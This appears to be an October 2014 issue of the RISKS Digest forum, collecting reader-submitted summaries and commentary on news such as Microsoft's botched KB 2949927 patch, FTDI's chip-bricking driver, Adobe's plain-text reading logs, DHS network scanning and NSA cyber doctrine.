http://www.infoworld.com/article/2834930/security/microsoft-yanks-botched-patch-kb-2949927-re-issues-kb-2952664.html


"Microsoft warns users to kill botched KB 2949927 patch" (Woody Leonhard)

Gene Wirchenko <genew@telus.net>
Mon, 20 Oct 2014 11:45:17 -0700
Woody Leonhard, InfoWorld | 20 Oct 2014
Microsoft yanked SHA-2 patch KB 2949927, and now goes further and
cautions users to uninstall the update
http://www.infoworld.com/article/2835571/microsoft-windows/microsoft-says-best-way-to-fix-botched-kb-2949927-patch-is-to-kill-it.html


"Microsoft misses Windows bug, hackers slip past patch"

Gene Wirchenko <genew@telus.net>
Thu, 23 Oct 2014 14:09:10 -0700
Gregg Keizer, Computerworld, 22 Oct 2014
Microsoft misses Windows bug, hackers slip past patch
Last week's security update 'not robust enough,' say researchers who
co-reported flaw
http://www.infoworld.com/article/2837085/security/microsoft-misses-windows-bug-hackers-slip-past-patch.html


Windows Update intentionally destroys chips (Brian Benchoff)

Henry Baker <hbaker1@pipeline.com>
Fri, 24 Oct 2014 09:35:35 -0700
Microsoft Windows Update distributed new driver code that intentionally
destroys "counterfeit" chips; the USB "PID" is set to 0 in the EEPROM of the
device, rendering the device useless forever more.

This ploy opens up a whole new front in the hacker wars; NSA TAO is no doubt
rubbing its hands with delight as we speak.

Just as STUXNET broke down one barrier in hacking; FTDI broke down another.
E.g., in the future, look for iPhone and Android apps which disable their
competitor apps & implanted medical devices that destroy other implanted
medical devices found in the same human body. [...]

Brian Benchoff, FTDI Screws Up, Backs Down, 24 Oct 2014
http://hackaday.com/2014/10/24/ftdi-screws-up-backs-down/


Re: Windows 9 Reportedly Skipped as Name Would Have Created Code Bugs

Mark Thorson <eee@sonic.net>
Mon, 27 Oct 2014 21:09:17 -0700
I confidently predict the next version will be Windows 20, which raises the
obvious question of what follows Windows 80?  I suggest Windows A.  That
buys another 26 major revisions, which should take us comfortably past the
year 199Z (2025 AD).


"12 surprising ways personal technology betrays your privacy" (Andy Patrizio)

Gene Wirchenko <genew@telus.net>
Fri, 03 Oct 2014 11:06:10 -0700
Andy Patrizio, ITworld, 3 Oct 2014
It's not just your boss or the government that's spying on you, it's
also the devices and technologies you embrace.
http://www.infoworld.com/article/2687778/security/security-164894-12-privacy-destroying-personal-technologies.html


"Critical Bugzilla vulnerability could give hackers access to undisclosed software flaws" (Lucian Constantin)

Gene Wirchenko <genew@telus.net>
Wed, 08 Oct 2014 16:16:17 -0700
Lucian Constantin, InfoWorld, 7 Oct 2014
http://www.infoworld.com/article/2692521/security/critical-bugzilla-vulnerability-could-give-hackers-access-to-undisclosed-software-flaws.html
Software projects that use the Bugzilla bug tracking software should
deploy the latest patches immediately, security researchers said


Adobe's e-book reader sends your reading logs back to Adobe—in plain text

Monty Solomon <monty@roscom.com>
Thu, 9 Oct 2014 00:29:15 -0400
Sean Gallagher, Ars Technica, 7 Oct 2014
Digital Editions even tracks which pages you've read.  It might break a New
Jersey Law.

Adobe's Digital Editions e-book and PDF reader, an application used by
thousands of libraries to give patrons access to electronic lending
libraries, actively logs and reports every document readers add to their
local "library" along with what users do with those files. Even worse, the
logs are transmitted over the Internet in the clear, allowing anyone who can
monitor network traffic (such as the National Security Agency, Internet
service providers and cable companies, or others sharing a public Wi-Fi
network) to follow along over readers' shoulders. ...

http://arstechnica.com/security/2014/10/adobes-e-book-reader-sends-your-reading-logs-back-to-adobe-in-plain-text/


DHS No Longer Needs Permission Slips to Monitor Other Agencies' Networks

Henry Baker <hbaker1@pipeline.com>
Tue, 07 Oct 2014 07:31:13 -0700
FYI—DHS can now *legally* hone their PEN skills on other agencies, both on their websites and their mobile devices.

Aliya Sternstein, NextGov.com. 3 Oct 2014
[Some selected quotes from the OMB memo:]
http://www.nextgov.com/cybersecurity/2014/10/dhs-no-longer-needs-permission-slips-monitor-other-agencies-networks-vulnerabilities/95807/

"a proactive vulnerability scanning process"
"only applicable to Federal civilian agency networks"
"does not impact classified or national security systems and/or networks"
"the number of phishing attacks is steadily increasing"

"Scan Internet accessible addresses and public facing segments of Federal
civilian agency systems for vulnerabilities on an ongoing basis as well as
in response to newly discovered vulnerabilities on an urgent basis, to
include without prior agency authorization on an emergency basis where not
prohibited by law"

"Provide DHS ... with a complete list of all Internet accessible addresses
and systems, including static IP addresses for external websites, servers
and other access points and domain name service names for dynamically
provisioned systems"

"Enter into a legally sufficient Memorandum of Agreement with DHS relating
to the deployment of EINSTEIN (an intrusion detection and prevention
capability operated by DHS)"

"Specifically, this memorandum ... requires Federal agencies to notify DHS
US-CERT of all cyber related (electronic) incidents ... ***within one
hour***"

"All existing Federal requirements for data protection and remote access are
applicable to mobile devices" [...]

See also
http://www.whitehouse.gov/sites/default/files/omb/memoranda/2015/m-15-01.pdf


The NSA has no interest in protecting you & me

Henry Baker <hbaker1@pipeline.com>
Fri, 10 Oct 2014 09:15:18 -0700
The following paragraphs are an attempt to explain why the NSA hasn't any
interest in protecting you and me from cyber criminals.  It isn't
nonfeasance, but a result of the misapplication of Cold War thinking to the
Internet, and the NSA's preoccupation with China instead of with criminal
gangs on the Internet.

You and I are merely the "human shields" in this new Cold Cyberwar which the
US DoD has deluded itself exists with China.

The US Defense Department in 2014 is still caught up in obsolete concepts
from the Cold War when it inappropriately attempts to achieve "deterrence"
through "mutual vulnerability" in *cyber warfare*.

The concept of "Mutually Assured Destruction" (MAD) attempts to convince
both sides in a conflict that no matter who starts a war, both sides will be
utterly destroyed.  MAD was the primary doctrine of the US throughout most
of the Cold War, and although the Soviets never did attack, they also never
completely bought into the MAD notion.

A major component of MAD is "Mutual Vulnerability": since both sides are
equally vulnerable, each feels that it has more to lose from a war than the
other.  However, one curious consequence of Mutual Vulnerability is that
*Civil Defense is actually destabilizing*.  If one side invests
significantly in civil defense, it becomes less vulnerable, and may believe
that a war is survivable.  Such a civil defense strategy will break the
"Mutual" in MAD.

During the Cold War, therefore, the US invested almost nothing in civil
defense; the Soviets—not so enamored with mutual vulnerability—
invested huge amounts.

As the links & quotes below demonstrate, the US DoD today has already
conceded that its cyber defenses are next-to-non-existent, and therefore has
ramped up its *offenses*—e.g., the NSA's "TAO" group—because it
believes that a MAD-style offensive deterrence is far cheaper than improving
defenses (i.e., echoes of the US Cold War strategy).

In the upside-down-world of MAD, mutual deterrence depends upon *mutual
vulnerability*, and hence *more vulnerable is better* !?!

The major problem with this MAD strategy is that while the deterrence may
eventually work against the Chinese *state*, this deterrence has absolutely
no effect against criminal enterprises terrorizing the Internet.  None of
these criminals feel the "Mutual" in MAD, much less the "Assured" or the
"Destruction".

So "MAD" is the reason why you and I remain vulnerable to ID crooks &
thieves; the more vulnerable, the better the deterrence works—at least
against the Chinese.

If all of this sounds insane/MAD, you're right!  It is insane, which is why
RISKS readers have to blow the whistle on these bankrupt Cold War relic
doctrines.

[See also the following items, truncated for RISKS.  PGN]

"A World Gone MAD No Longer"
http://missiledefensereview.org/2014/07/30/a-world-gone-mad-no-longer/

Sino-American Strategic Restraint in an Age of Vulnerability
by David C. Gompert and Phillip C. Saunders
http://www.dtic.mil/get-tr-doc/pdf?AD=ADA577518


Law Lets I.R.S. Seize Accounts on Suspicion, No Crime Required

Monty Solomon <monty@roscom.com>
Sun, 26 Oct 2014 09:05:59 -0400
Using a law designed to help catch drug traffickers, racketeers and
terrorists by tracking their cash, the government has gone after
run-of-the-mill business owners and wage earners.

http://www.nytimes.com/2014/10/26/us/law-lets-irs-seize-accounts-on-suspicion-no-crime-required.html


How Facebook Is Changing the Way Its Users Consume Journalism

Monty Solomon <monty@roscom.com>
Sun, 26 Oct 2014 23:37:56 -0400
Facebook uses mathematical formulas to predict what its users might want to
read on the site, from which, a study says, about 30 percent of adults in
America get their news.

http://www.nytimes.com/2014/10/27/business/media/how-facebook-is-changing-the-way-its-users-consume-journalism.html


Re: where last passenger went (Epstein, RISKS-28.31)

Dimitri Maziuk <dmaziuk@bmrb.wisc.edu>
Fri, 24 Oct 2014 17:24:35 -0500
I'd be more worried about taxi drivers perusing Google's location
history URL, finding areas where most destinations are, and staying
there. The risk is then you can't get a cab anywhere else.

BioMagResBank, UW-Madison—http://www.bmrb.wisc.edu


Re: Should Airplanes Be Flying Themselves? (William Langewiesche)

"John Levine" <johnl@iecc.com>
24 Oct 2014 23:16:37 -0000
It's an excellent article, well worth the 10 minutes to read it.

The Gimli Glider was in many ways the direct opposite of the Air France
crash.  In the Gimli case, there was a real and very severe problem, the
plane was in the middle of nowhere and ran out of fuel.  If the pilots
hadn't taken skillful action, the plane would have fallen out of the sky and
crashed.

With the Air France flight, there was no physical problem other than that
some sensors were iced over.  As Langewiesche makes clear, if the pilots had
done nothing at all, the plane would have been fine.  The sensor loss made
the plane drop back from the most automatic mode to a less automatic one,
but even so, the plane was flying without difficulty.


Taylor Swift Tops Canadian iTunes Chart With 8 Seconds of White Noise (Lorena O'Neil)

Henry Baker <hbaker1@pipeline.com>
Fri, 24 Oct 2014 18:17:40 -0700
FYI—I wonder if the music isn't "white noise" after all, but the sole
sound of DRM.  I can't wait for this clip to be posted to YouTube, so that a
DMCA takedown notice can be issued by one of those DMCA bots!

Lorena O'Neil, The Hollywood Reporter
http://www.msn.com/en-us/music/news/taylor-swift-tops-canadian-itunes-chart-with-eight-seconds-of-white-noise/ar-BBaCB7A

A glitch in the Canadian version of iTunes released a track called "Track
3," that looked like it could be a new track from her upcoming album 1989
but was actually just white noise.  Nevertheless, the song soared to the
top, beating out her new songs that actually are real music, including
"Shake It Off," "Welcome to New York" and "Out of the Woods."

Haters might hate but once a singer scores a chart-topping hit comprised
solely of white noise, it's hard to deny she's an unstoppable musical force.
